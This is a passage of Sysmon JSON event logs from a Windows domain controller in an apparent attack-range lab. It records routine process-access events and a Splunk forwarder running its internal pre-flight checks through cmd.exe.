C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.407","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3352,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.407\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF4-5F25-0000-00106D660500}\r\nTargetProcessId: 4440\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.407","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF4-5F25-0000-00106D660500}","TargetProcessId":"4440","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3353,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.626\r\nSourceProcessGUID: {41C8662E-1FF4-5F25-0000-00106D660500}\r\nSourceProcessId: 4440\r\nSourceThreadId: 4788\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.626","SourceProcessGUID":"{41C8662E-1FF4-5F25-0000-00106D660500}","SourceProcessId":"4440","SourceThreadId":"4788","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3354,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.657\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.657","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3355,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.692\r\nProcessGuid: {41C8662E-1FF4-5F25-0000-0010AA6A0500}\r\nProcessId: 2256\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal pre-flight-checks --answer-yes --no-prompt 2>&1\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.692","ProcessGuid":"{41C8662E-1FF4-5F25-0000-0010AA6A0500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal pre-flight-checks --answer-yes --no-prompt 2&gt;&amp;1","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3356,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.688\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 4472\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1F64-5F25-0000-0010B46A0100}\r\nTargetProcessId: 2256\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+eef54|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ebd15|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.688","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"4472","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1F64-5F25-0000-0010B46A0100}","TargetProcessId":"2256","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+eef54|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ebd15|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3357,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.688\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F64-5F25-0000-0010B46A0100}\r\nTargetProcessId: 2256\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.688","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F64-5F25-0000-0010B46A0100}","TargetProcessId":"2256","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3358,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.688\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.688","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3359,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.688\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.688","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3360,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.688\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 